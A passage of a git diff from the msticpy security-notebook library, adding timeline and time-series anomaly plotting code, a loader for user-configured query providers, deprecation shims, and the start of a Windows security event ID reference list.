+    grouped_data = grouped_data.reset_index()
+    grouped_data["Width"] = grouped_data["end_time"] - grouped_data["start_time"]
+    grouped_data["Center"] = grouped_data["start_time"] + (grouped_data["Width"] / 2)
+    return grouped_data
diff --git a/msticpy/nbtools/timeline_pd_accessor.py b/msticpy/nbtools/timeline_pd_accessor.py
new file mode 100644
index 000000000..78bd53e3e
--- /dev/null
+++ b/msticpy/nbtools/timeline_pd_accessor.py
@@ -0,0 +1,244 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pandas accessor class for timeline functions."""
+from typing import Iterable, Optional, Union
+import pandas as pd
+
+from bokeh.models import LayoutDOM
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+# pylint: disable=unused-import, import-outside-toplevel, cyclic-import
+
+
+@pd.api.extensions.register_dataframe_accessor("mp_timeline")
+class TimeLineAccessor:
+    """Pandas api extension for Timeline."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pandas extension class."""
+        from .timeline import display_timeline, display_timeline_values
+        from .timeline_duration import display_timeline_duration
+
+        self._display_timeline = display_timeline
+        self._display_timeline_values = display_timeline_values
+        self._display_timeline_duration = display_timeline_duration
+        self._df = pandas_obj
+
+    def plot(self, **kwargs) -> LayoutDOM:
+        """
+        Display a timeline of events.
+
+        Parameters
+        ----------
+        time_column : str, optional
+            Name of the timestamp column
+            (the default is 'TimeGenerated')
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        title : str, optional
+            Title to display (the default is None)
+        alert : SecurityAlert, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_event : Any, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_time : datetime, optional
+            Add a reference line/label using `ref_time` (the default is None)
+        group_by : str
+            The column to group timelines on.
+        legend: str, optional
+            "left", "right", "inline" or "none"
+            (the default is to show a legend when plotting multiple series
+            and not to show one when plotting a single series)
+        yaxis : bool, optional
+            Whether to show the yaxis and labels (default is False)
+        ygrid : bool, optional
+            Whether to show the yaxis grid (default is False)
+        xgrid : bool, optional
+            Whether to show the xaxis grid (default is True)
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy")
+        overlay_data : pd.DataFrame:
+            A second dataframe to plot as a different series.
+        overlay_color : str
+            Overlay series color (default is "green")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_time_col : str, optional
+            Add references line/label using the this column in `ref_events`
+            for the time value (x-axis).
+            (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+            `time_column` is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return self._display_timeline(data=self._df, **kwargs)
+
+    # pylint: disable=invalid-name
+    def plot_values(self, value_col: str = None, **kwargs) -> LayoutDOM:
+        """
+        Display a timeline of events.
+
+        Parameters
+        ----------
+        time_column : str, optional
+            Name of the timestamp column
+            (the default is 'TimeGenerated')
+        value_col : str
+            The column name holding the value to plot vertically
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        x : str, optional
+            alias of `time_column`
+        y : str, optional
+            alias of `value_col`
+        title : str, optional
+            Title to display (the default is None)
+        ref_event : Any, optional
+            Add a reference line/label using the alert time (the default is None)
+        ref_time : datetime, optional
+            Add a reference line/label using `ref_time` (the default is None)
+        ref_label : str, optional
+            A label for the `ref_event` or `ref_time` reference item
+        group_by : str
+            (where `data` is a DataFrame)
+            The column to group timelines on
+        legend: str, optional
+            "left", "right", "inline" or "none"
+            (the default is to show a legend when plotting multiple series
+            and not to show one when plotting a single series)
+        yaxis : bool, optional
+            Whether to show the yaxis and labels
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy"). This is overridden by
+            automatic color assignments if plotting a grouped chart
+        kind : Union[str, List[str]]
+            one or more glyph types to plot., optional
+            Supported types are "circle", "line" and "vbar" (default is "vbar")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_time_col : str, optional
+            Add references line/label using the this column in `ref_events`
+            for the time value (x-axis).
+            (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+            `time_column` is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return self._display_timeline_values(
+            data=self._df, value_col=value_col, **kwargs
+        )
+
+    def plot_duration(
+        self,
+        group_by: Union[Iterable[str], str],
+        time_column: str = "TimeGenerated",
+        end_time_column: Optional[str] = None,
+        **kwargs,
+    ) -> LayoutDOM:  # noqa: C901, MC0001
+        """
+        Display a duration timeline of events grouped by one or more columns.
+
+        Parameters
+        ----------
+        group_by : Union[Iterable[str], str]
+            The column name or iterable of column names to group the data by.
+        time_column : str
+            Primary time column - will be used to calculate the
+            start time of the duration for each group.
+            If `end_time_column` is not specified it will also be used to
+            calculate the end time.
+        end_time_column : Optional[str]
+            If supplied, it will be used to calculate the end time
+            of the duration for each group.
+
+        Other Parameters
+        ----------------
+        title : str, optional
+            Title to display (the default is None)
+        ylabel_cols : Optional[Iterable[str]], optional
+            The subset of the group columns to use for the y-axis labels.
+        yaxis : bool, optional
+            Whether to show the yaxis and labels
+        range_tool : bool, optional
+            Show the the range slider tool (default is True)
+        source_columns : list, optional
+            List of default source columns to use in tooltips
+            (the default is None)
+        height : int, optional
+            The height of the plot figure
+            (the default is auto-calculated height)
+        width : int, optional
+            The width of the plot figure (the default is 900)
+        color : str
+            Default series color (default is "navy")
+        ref_events : pd.DataFrame, optional
+            Add references line/label using the event times in the dataframe.
+            (the default is None)
+        ref_col : str, optional
+            The column name to use for the label from `ref_events`
+            (the default is None)
+        ref_times : List[Tuple[datetime, str]], optional
+            Add one or more reference line/label using (the default is None)
+
+        Returns
+        -------
+        LayoutDOM
+            The bokeh plot figure.
+
+        """
+        return self._display_timeline_duration(
+            data=self._df,
+            group_by=group_by,
+            time_column=time_column,
+            end_time_column=end_time_column,
+            **kwargs,
+        )
diff --git a/msticpy/nbtools/timeseries.py b/msticpy/nbtools/timeseries.py
new file mode 100644
index 000000000..1b7f1a76d
--- /dev/null
+++ b/msticpy/nbtools/timeseries.py
@@ -0,0 +1,249 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for common display functions."""
+from typing import Any, Dict
+from itertools import zip_longest
+
+import pandas as pd
+from bokeh.io import output_notebook, show
+from bokeh.models import ColumnDataSource, NumeralTickFormatter, HoverTool
+
+# pylint: disable=no-name-in-module
+from bokeh.plotting import figure, reset_output
+from bokeh.layouts import column
+
+from .._version import VERSION
+from ..common.utility import export, check_kwargs
+from .timeline import (
+    _create_tool_tips,
+    _calc_auto_plot_height,
+    _create_range_tool,
+    _get_tick_formatter,
+    _add_ref_line,
+    _get_ref_event_time,
+    _DEFAULT_KWARGS,
+    _TL_VALUE_KWARGS,
+)
+
+__version__ = VERSION
+__author__ = "Ashwin Patil"
+
+
+_TS_KWARGS = ["xgrid", "ygrid"]
+
+
+# pylint: disable=invalid-name, too-many-locals, too-many-statements
+# pylint: disable=too-many-branches, too-many-function-args, too-many-arguments
+@export  # noqa: C901, MC0001
+def display_timeseries_anomalies(
+    data: pd.DataFrame,
+    y: str = "Total",
+    time_column: str = "TimeGenerated",
+    anomalies_column: str = "anomalies",
+    source_columns: list = None,
+    period: int = 30,
+    **kwargs,
+) -> figure:
+    """
+    Display time series anomalies visualization.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame as a time series data set retrieved from KQL time series
+        functions. Dataframe must have columns specified in `y`, `time_column`
+        and `anomalies_column` parameters
+    y : str, optional
+        Name of column holding numeric values to plot against time series to
+        determine anomalies
+        (the default is 'Total')
+    time_column : str, optional
+        Name of the timestamp column
+        (the default is 'TimeGenerated')
+    anomalies_column : str, optional
+        Name of the column holding binary status(1/0) for anomaly/benign
+        (the default is 'anomalies')
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+    period : int, optional
+        Period of the dataset for hourly-no of days, for daily-no of weeks.
+        This is used to correctly calculate the plot height.
+        (the default is 30)
+
+    Other Parameters
+    ----------------
+    ref_time : datetime, optional
+        Input reference line to display (the default is None)
+    title : str, optional
+        Title to display (the default is None)
+    legend: str, optional
+        Where to position the legend
+        None, left, right or inline (default is None)
+    yaxis : bool, optional
+        Whether to show the yaxis and labels
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    xgrid : bool, optional
+        Whether to show the xaxis grid (default is True)
+    ygrid : bool, optional
+        Whether to show the yaxis grid (default is False)
+    color : list, optional
+        List of colors to use in 3 plots as specified in order
+        3 plots- line(observed), circle(baseline), circle_x/user specified(anomalies).
+        (the default is ["navy", "green", "firebrick"])
+
+    Returns
+    -------
+    figure
+        The bokeh plot figure.
+
+    """
+    check_kwargs(kwargs, _DEFAULT_KWARGS + _TL_VALUE_KWARGS + _TS_KWARGS)
+
+    reset_output()
+    output_notebook()
+    height: int = kwargs.pop("height", None)
+    width: int = kwargs.pop("width", 1200)
+    title: str = kwargs.pop("title", None)
+    time_column = kwargs.get("x", time_column)
+    show_range: bool = kwargs.pop("range_tool", True)
+    color: list = kwargs.get("color", ["navy", "green", "firebrick"])
+    color = [
+        col1 or col2
+        for col1, col2 in zip_longest(color[:3], ["navy", "green", "firebrick"])
+    ]
+    legend_pos: str = kwargs.pop("legend", "top_left")
+    xgrid: bool = kwargs.pop("xgrid", False)
+    ygrid: bool = kwargs.pop("ygrid", False)
+    kind: str = kwargs.pop("kind", "circle_x")
+
+    ref_time, ref_label = _get_ref_event_time(**kwargs)
+
+    source = ColumnDataSource(data)
+
+    series_count = len(data) // period
+
+    # Filtering anomalies to create new dataframe
+    source_columns = [col for col in data.columns if col not in [anomalies_column]]
+    data_anomaly = data[data[anomalies_column] == 1][source_columns].reset_index()
+
+    tooltips, formatters = _create_tool_tips(data, source_columns)
+    hover = HoverTool(tooltips=tooltips, formatters=formatters)
+
+    # Create the Plot figure
+    title = title or "Time Series Anomalies Visualization"
+    min_time = data[time_column].min()
+    max_time = data[time_column].max()
+    start_range = min_time - ((max_time - min_time) * 0.05)
+    end_range = max_time + ((max_time - min_time) * 0.05)
+    height = height or _calc_auto_plot_height(series_count)
+
+    plot = figure(
+        x_range=(start_range, end_range),
+        min_border_left=50,
+        plot_height=height,
+        plot_width=width,
+        x_axis_label=time_column,
+        x_axis_type="datetime",
+        y_axis_label=y,
+        x_minor_ticks=10,
+        tools=[hover, "xwheel_zoom", "box_zoom", "reset", "save", "xpan"],
+        toolbar_location="above",
+        title=title,
+    )
+
+    if xgrid:
+        plot.xgrid.minor_grid_line_color = "navy"
+        plot.xgrid.minor_grid_line_alpha = 0.1
+        plot.xgrid.grid_line_color = "navy"
+        plot.xgrid.grid_line_alpha = 0.3
+    else:
+        plot.xgrid.grid_line_color = None
+    if ygrid:
+        plot.ygrid.minor_grid_line_color = "navy"
+        plot.ygrid.minor_grid_line_alpha = 0.1
+        plot.ygrid.grid_line_color = "navy"
+        plot.ygrid.grid_line_alpha = 0.3
+    else:
+        plot.ygrid.grid_line_color = None
+
+    # set the tick formatter
+    plot.xaxis[0].formatter = _get_tick_formatter()
+    plot.yaxis.formatter = NumeralTickFormatter(format="00")
+
+    plot.circle(
+        time_column,
+        y,
+        line_color=color[0],
+        size=4,
+        source=source,
+        legend_label="observed",
+    )
+    plot.line(
+        time_column,
+        "baseline",
+        line_color=color[1],
+        source=source,
+        legend_label="baseline",
+    )
+
+    # create default plot args
+    arg_dict: Dict[str, Any] = dict(
+        x=time_column,
+        y=y,
+        size=12,
+        color=color[2],
+        fill_alpha=0.2,
+        legend_label="anomalies",
+        source=ColumnDataSource(data_anomaly),
+    )
+
+    # setting the visualization types for anomalies based on user input to kind
+    if kind == "cross":
+        plot.cross(**arg_dict)
+    elif kind == "diamond":
+        plot.diamond(**arg_dict)
+    elif kind == "diamond_cross":
+        plot.diamond_cross(**arg_dict)
+    else:
+        plot.circle_x(**arg_dict)
+
+    # interactive legend to hide single/multiple plots if selected
+    plot.legend.location = legend_pos
+    plot.legend.click_policy = "hide"
+
+    # Create plot for the score column to act as as range selector
+    rng_select = _create_range_tool(
+        data=data,
+        y="score",
+        min_time=min_time,
+        max_time=max_time,
+        plot_range=plot.x_range,
+        width=width,
+        height=height,
+        time_column=time_column,
+    )
+
+    # if we have a reference timestamp, plot the time as a line
+    if ref_time is not None:
+        _add_ref_line(plot, ref_time, ref_label, data[y].max())
+
+    if show_range:
+        show(column(plot, rng_select))
+        return column(plot, rng_select)
+
+    show(plot)
+    return plot
+
+
+# Keep misspelled name for backward compatability
+display_timeseries_anomolies = display_timeseries_anomalies
diff --git a/msticpy/nbtools/user_config.py b/msticpy/nbtools/user_config.py
new file mode 100644
index 000000000..a59038e46
--- /dev/null
+++ b/msticpy/nbtools/user_config.py
@@ -0,0 +1,287 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+User configuration functions.
+
+Loads providers based on user_defaults section in msticpyconfig.yaml
+
+.. parsed-literal::
+
+    UserDefaults:
+    # List of query providers to load
+        QueryProviders:
+            AzureSentinel:
+            Default:          # name of the provider listed in AzureSentinel.Workspaces
+                alias: azsent   # optional - create "qry_azsent" object in globals
+            CyberSoc:
+                alias: soc
+                connect: False  # optional - do not connect on load
+            Splunk:             # add non-sentinel providers like this
+            connect: False
+            LocalData: local
+
+    # List of other providers/components to load
+    LoadComponents:
+        TILookup:           # No parameters
+        GeoIpLookup:
+        provider: GeoLiteLookup   # geoip provider to use
+        Notebooklets:       # Load and intialize Notebooklets
+        query_provider:   # Pass it this query provider at startup
+            AzureSentinel:
+            workspace: CyberSoc
+        Pivot:              # No parameters
+        AzureData:          # auth_methods passed as startup param
+        auth_methods: ['cli','interactive']
+        AzureSentinelAPI:
+        auth_methods: ['env','interactive']
+        connect: False   # Load but do not connect
+
+
+Note: For components that require authentication the default
+is to connect after loading. You can skip the connect step by
+add connect: False to the entry.
+"""
+import textwrap
+from contextlib import redirect_stdout
+from io import StringIO
+from typing import Any, Dict, Tuple
+
+from .._version import VERSION
+from ..common.pkg_config import settings
+from ..common.wsconfig import WorkspaceConfig
+from ..data.data_providers import QueryProvider
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def load_user_defaults() -> Dict[str, object]:
+    """
+    Load providers from user defaults in msticpyconfig.yaml.
+
+    Returns
+    -------
+    Dict[str, object]
+        Dict of object name and provider instances.
+
+    """
+    user_defaults = settings.get("UserDefaults")
+    if not user_defaults:
+        return {}
+    prov_dict = _load_query_providers(user_defaults)
+    prov_dict.update(_load_components(user_defaults, namespace=prov_dict))
+
+    return prov_dict
+
+
+def _load_query_providers(user_defaults):
+    prov_dict = {}
+    query_provs = user_defaults.get("QueryProviders", {})
+    if query_provs and isinstance(query_provs, dict):
+        for prov_name, qry_prov_entry in user_defaults.get("QueryProviders").items():
+            if prov_name == "AzureSentinel":
+                provs = _load_az_workspaces(prov_name, qry_prov_entry)
+                prov_dict.update(provs)
+            else:
+                obj_name, prov_obj = _load_provider(prov_name, qry_prov_entry)
+                prov_dict[obj_name] = prov_obj
+    return prov_dict
+
+
+def _load_components(user_defaults, namespace=None):
+    prov_dict = {}
+    if "LoadComponents" not in user_defaults:
+        return prov_dict
+    comps_to_load = user_defaults.get("LoadComponents", {})
+
+    for comp in COMP_LOADERS:
+        load_comp_func = COMP_LOADERS.get(comp)
+        if comp not in comps_to_load or not load_comp_func:
+            continue
+        comp_settings = comps_to_load.get(comp)
+
+        if load_comp_func:
+            print(f"Loading *{comp}*. ", end="")
+            comp_out = StringIO()
+            with redirect_stdout(comp_out):
+                # We're calling the load_component function defined for each comp
+                # and passing the dict of currently loaded providers
+                # plus any global namespace passed to us (usually globals())
+                obj_name, comp_obj = load_comp_func(
+                    comp_settings, local_ns=prov_dict, global_ns=namespace
+                )
+
+            prov_dict[obj_name] = comp_obj
+            print(f"- as '{obj_name}'")
+            if comp_out.getvalue():
+                print("   Component output:")
+                print(
+                    "\n".join(
+                        textwrap.wrap(
+                            comp_out.getvalue(),
+                            replace_whitespace=True,
+                            initial_indent="    ",
+                            subsequent_indent="    ",
+                        )
+                    )
+                )
+        print()
+    return prov_dict
+
+
+def _load_az_workspaces(
+    prov_name: str, azsent_prov_entry: Dict[str, Any]
+) -> Dict[str, Any]:
+    az_provs = {}
+    for ws_name, ws_settings in azsent_prov_entry.items():
+        print(f"Loading {prov_name}, workspace: {ws_name}")
+        alias = ws_settings.get("alias", ws_name)
+        connect = ws_settings.get("connect", True)
+        obj_name = f"qry_{alias.lower()}"
+        print(f"Workspace *{ws_name}* query provider loaded as '{obj_name}'. ", end="")
+        prov_obj = QueryProvider(prov_name)
+
+        if connect:
+            ws_params = {}
+            if ws_name != "Default":
+                ws_params = {"workspace": ws_name}
+            ws_config = WorkspaceConfig(**ws_params)  # type: ignore
+            prov_obj.connect(ws_config.code_connect_str)
+            print("Connected.")
+        az_provs[obj_name] = prov_obj
+    return az_provs
+
+
+def _load_provider(prov_name: str, qry_prov_entry: Dict[str, Any]) -> Tuple[str, Any]:
+    alias = qry_prov_entry.get("alias", prov_name)
+    connect = qry_prov_entry.get("connect", True)
+    obj_name = f"qry_{alias.lower()}"
+    prov_obj = QueryProvider(prov_name)
+    print(f"Loaded *{prov_name}* as '{obj_name}'. ", end="")
+    if connect:
+        prov_obj.connect()
+        print("Connected.")
+    return obj_name, prov_obj
+
+
+# pylint: disable=import-outside-toplevel
+def _load_ti_lookup(comp_settings=None, **kwargs):
+    del comp_settings, kwargs
+    from ..sectools.tilookup import TILookup
+
+    return "ti_lookup", TILookup()
+
+
+def _load_geoip_lookup(comp_settings=None, **kwargs):
+    del kwargs
+    provider = (
+        comp_settings.get("provider") if isinstance(comp_settings, dict) else None
+    )
+    if provider == "GeoLiteLookup":
+        from ..sectools.geoip import GeoLiteLookup
+
+        return "geoip", GeoLiteLookup()
+    if provider == "IpStackLookup":
+        from ..sectools.geoip import IPStackLookup
+
+        return "geoip", IPStackLookup()
+    return None, None
+
+
+def _load_notebooklets(comp_settings=None, **kwargs):
+    nbinit_params = {}
+    if comp_settings and isinstance(comp_settings, dict):
+        prov_name, prov_args = next(
+            iter(comp_settings.get("query_provider", {}).items())
+        )
+        if prov_name:
+            nbinit_params = {"query_provider": prov_name}
+        if prov_args:
+            nbinit_params.update(
+                {f"{prov_name}_{name}": val for name, val in prov_args.items()}
+            )
+    namespace = kwargs.pop("global_ns", {})
+    namespace.update(kwargs.pop("local_ns", {}))
+    providers = _get_provider_names(namespace)
+    # Add these as additional providers
+    providers = [f"+{prov}" for prov in providers]
+    nbinit_params.update({"providers": providers, "namespace": namespace})
+    try:
+        import msticnb
+
+        msticnb.init(**nbinit_params)
+        return "nb", msticnb
+    except ImportError:
+        print("Cannot load MSTIC notebooklets (msticnb) package.")
+        print("Please install - 'pip install msticnb'")
+
+    return None, None
+
+
+def _load_pivot(comp_settings=None, **kwargs):
+    del comp_settings
+    from ..datamodel.pivot import Pivot
+
+    namespace = kwargs.get("global_ns", {}).copy()
+    namespace.update(kwargs.get("local_ns", {}))
+    piv_kwargs = {"namespace": namespace}
+    pivot = Pivot(**piv_kwargs)
+    return "pivot", pivot
+
+
+def _load_azure_data(comp_settings=None, **kwargs):
+    del kwargs
+    from ..data.azure_data import AzureData
+
+    az_data = AzureData()
+    connect = comp_settings.pop("connect", True)
+    connect_args = comp_settings
+    if connect:
+        az_data.connect(**connect_args)
+        print("Connected. ", end="")
+    return "az_data", az_data
+
+
+def _load_azsent_api(comp_settings=None, **kwargs):
+    del kwargs
+    from ..data.azure import MicrosoftSentinel
+
+    res_id = comp_settings.pop("res_id", None)
+    if res_id:
+        az_sent = MicrosoftSentinel(res_id=res_id)
+    else:
+        az_sent = MicrosoftSentinel()
+    connect = comp_settings.pop("connect", True)
+    connect_args = comp_settings
+    if connect:
+        az_sent.connect(**connect_args)
+        print("Connected. ", end="")
+    return "azs_api", az_sent
+
+
+# providers loaded in order specified
+# Do not alter the order unless you know what dependencies
+# are between the different providers.
+COMP_LOADERS = {
+    "TILookup": _load_ti_lookup,
+    "GeoIpLookup": _load_geoip_lookup,
+    "AzureData": _load_azure_data,
+    "AzureSentinelAPI": _load_azsent_api,
+    "Pivot": _load_pivot,  # Pivots loaded after most providers
+    "Notebooklets": _load_notebooklets,  # Notebooklets calls add_pivots
+}
+
+
+def _get_provider_names(prov_dict):
+    providers = []
+    for _, obj in prov_dict.items():
+        if isinstance(obj, QueryProvider) and obj.connected:
+            providers.append(obj.environment.casefold())
+        else:
+            cls_name = obj.__class__.__name__
+            if cls_name in COMP_LOADERS and cls_name != "Pivot":
+                providers.append(cls_name.casefold())
+    return providers
diff --git a/msticpy/nbtools/utility.py b/msticpy/nbtools/utility.py
index 57dfbbf47..07a6b66f8 100644
--- a/msticpy/nbtools/utility.py
+++ b/msticpy/nbtools/utility.py
@@ -3,151 +3,17 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""Miscellaneous helper methods for Jupyter Notebooks."""
-import re
-import sys
-from IPython.core.display import display, HTML
+"""Deprecated path for common.utility.py."""
+import warnings
 
-import pandas as pd
+# flake8: noqa: F403, F401
+# pylint: disable=wildcard-import, unused-wildcard-import
+from ..common.utility import *
+from ..common.utility import md, md_warn
 
-from .. _version import VERSION
 
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-
-def export(func):
-    """Decorate function or class to export to __all__."""
-    mod = sys.modules[func.__module__]
-    if hasattr(mod, '__all__'):
-        mod.__all__.append(func.__name__)
-    else:
-        mod.__all__ = [func.__name__]
-    return func
-
-
-@export
-def string_empty(string):
-    """Return True if the input string is None or whitespace."""
-    return (string is None) or not (string and string.strip())
-
-
-@export
-def is_not_empty(test_object):
-    """Return True if the test_object is not None or empty."""
-    if test_object:
-        if isinstance(test_object, str):
-            if test_object.strip():
-                # test_object is not None AND myString is not empty or blank
-                return True
-            return False
-        return True
-    return False
-
-
-# Toggle Code Cell Contents
-_TOGGLE_CODE_STR = '''
-<form action="javascript:code_toggle()">
-    <input type="submit" id="toggleButton" value="Show/Hide Code">
-</form>
-'''
-
-_TOGGLE_CODE_PREPARE_STR = '''
-    <script>
-    function code_toggle() {
-        if ($('div.cell.code_cell.rendered.selected div.input').css('display')!='none'){
-            $('div.cell.code_cell.rendered.selected div.input').hide();
-        } else {
-            $('div.cell.code_cell.rendered.selected div.input').show();
-        }
-    }
-    </script>
-
-'''
-display(HTML(_TOGGLE_CODE_PREPARE_STR))
-
-
-@export
-def toggle_code():
-    """Display a toggle button to hide/reveal code cell."""
-    display(HTML(_TOGGLE_CODE_STR))
-
-
-# String escapes
-@export
-def escape_windows_path(str_path):
-    """Escape backslash characters in a string."""
-    if is_not_empty(str_path):
-        return str_path.replace('\\', '\\\\')
-    return str_path
-
-
-@export
-def unescape_windows_path(str_path):
-    """Remove escaping from backslash characters in a string."""
-    if is_not_empty(str_path):
-        return str_path.replace('\\\\', '\\')
-    return str_path
-
-
-_PD_INSTALLED_VERSION = tuple(pd.__version__.split('.'))
-_PD_VER_23 = ('0', '23', '0')
-
-
-@export
-def pd_version_23() -> bool:
-    """Return True if pandas version 0.23.0 or later is installed."""
-    return _PD_INSTALLED_VERSION >= _PD_VER_23
-
-
-@export
-def get_nb_query_param(nb_url_search: str, param: str) -> str:
-    """
-    Get a url query parameter from the search string.
-
-    Arguments:
-        nb_url_search {str} -- The URL search string
-        param {str} -- The parameter name to search for
-
-    Returns:
-        value of the query string parameter or None if not found.
-
-    """
-    qs_regex = r'[\\?&]{param}=(?P<val>[^&#]*)'.format(param=param)
-    query_string_match = re.search(qs_regex, nb_url_search)
-    if query_string_match:
-        return query_string_match['val']
-    return None
-
-
-@export
-def get_nb_query_params(nb_url_search: str) -> dict:
-    """
-    Get the url query parameters from the search string.
-
-    Arguments:
-        nb_url_search {str} -- The URL search string
-
-    Returns:
-        dictionary of the query string parameters.
-
-    """
-    nb_params = {}
-    query_string_match = re.search(r'\?(?P<qs>[^#]+)#?', nb_url_search)
-    if query_string_match:
-        for param in query_string_match['qs'].split('&'):
-            if '=' in param:
-                nb_params[param.split('=')[0]] = param.split('=')[1]
-    return nb_params
-
-
-@export
-def get_notebook_query_string():
-    """Execute javascript to publish notebook query string as python variable."""
-    HTML('''
-    <script type="text/javascript">
-        IPython.notebook.kernel.execute(
-            "nb_query_string='".concat(window.location.search).concat("'"));
-    </script>
-    ''')
-    return None
+WARN_MSSG = (
+    "This module has moved to msticpy.common.utility\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/nbtools/wsconfig.py b/msticpy/nbtools/wsconfig.py
index ff21055da..3c5a5514c 100644
--- a/msticpy/nbtools/wsconfig.py
+++ b/msticpy/nbtools/wsconfig.py
@@ -3,56 +3,16 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""Module for Log Analytics-related configuration."""
+"""Deprecated path for common.wsconfig.py."""
+import warnings
 
-import json
-from .utility import export
+# flake8: noqa: F401
+# pylint: disable=unused-import
+from ..common.wsconfig import WorkspaceConfig
 
-__version__ = '0.1'
-__author__ = 'Ian Hellen'
 
-@export
-class WorkspaceConfig(object):
-    """Workspace configuration class."""
-
-    # Constants
-    TENANT_ID = "{{cookiecutter.tenant_id}}"
-    SUBSCRIPTION_ID = "{{cookiecutter.subscription_id}}"
-    RESOURCE_GROUP = "{{cookiecutter.resource_group}}"
-    WORKSPACE_ID = "{{cookiecutter.workspace_id}}"
-    WORKSPACE_NAME = "{{cookiecutter.workspace_name}}"
-
-    def __init__(self, config_file: str):
-        """
-        Load current Azure Notebooks configuration for Log Analytics.
-
-        Arguments:
-            config_file {str} -- path to the configuration file.
-        """
-        self._config_file = config_file
-        self._config = self._read_config_values(config_file)
-
-    def __getitem__(self, key: str):
-        """Allow property get using dictionary key syntax."""
-        if key in self._config:
-            return self._config[key]
-        raise KeyError
-
-    def __setitem__(self, key: str, value: any):
-        """Allow property set using dictionary key syntax."""
-        self._config[key] = value
-
-    def __contains__(self, key: str):
-        """Allow property in test."""
-        # In operator overload
-        return (key == 'Type' or
-                key in self._config or
-                key in self.__dict__)
-
-    @classmethod
-    def _read_config_values(cls, file_path: str) -> dict:
-        """Read configuration file."""
-        with open(file_path) as json_file:
-            if json_file:
-                json_config = json.load(json_file)
-                return json_config
+WARN_MSSG = (
+    "This module has moved to msticpy.common.wsconfig\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/resources/WinSecurityEvent.json b/msticpy/resources/WinSecurityEvent.json
new file mode 100644
index 000000000..5fdbb54a9
--- /dev/null
+++ b/msticpy/resources/WinSecurityEvent.json
@@ -0,0 +1,2613 @@
+[
+	{
+		"category": "Account Logon",
+		"subcategory": "Credential Validation",
+		"event_id": 4774,
+		"description": "An account was mapped for logon. ",
+		"full_desc": "4774: An account was mapped for logon. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Credential Validation",
+		"event_id": 4775,
+		"description": "An account could not be mapped for logon. ",
+		"full_desc": "4775: An account could not be mapped for logon. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Credential Validation",
+		"event_id": 4776,
+		"description": "The computer attempted to validate the credentials for an account.",
+		"full_desc": "4776: The computer attempted to validate the credentials for an account."
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Credential Validation",
+		"event_id": 4777,
+		"description": "The domain controller failed to validate the credentials for an account. ",
+		"full_desc": "4777: The domain controller failed to validate the credentials for an account. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Kerberos Authentication Service",
+		"event_id": 4768,
+		"description": "A Kerberos authentication ticket (TGT) was requested. ",
+		"full_desc": "4768: A Kerberos authentication ticket (TGT) was requested. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Kerberos Authentication Service",
+		"event_id": 4771,
+		"description": "Kerberos pre-authentication failed. ",
+		"full_desc": "4771: Kerberos pre-authentication failed. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Kerberos Authentication Service",
+		"event_id": 4772,
+		"description": "A Kerberos authentication ticket request failed. ",
+		"full_desc": "4772: A Kerberos authentication ticket request failed. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Kerberos Service Ticket Operations",
+		"event_id": 4769,
+		"description": "A Kerberos service ticket was requested. ",
+		"full_desc": "4769: A Kerberos service ticket was requested. "
+	},
+	{
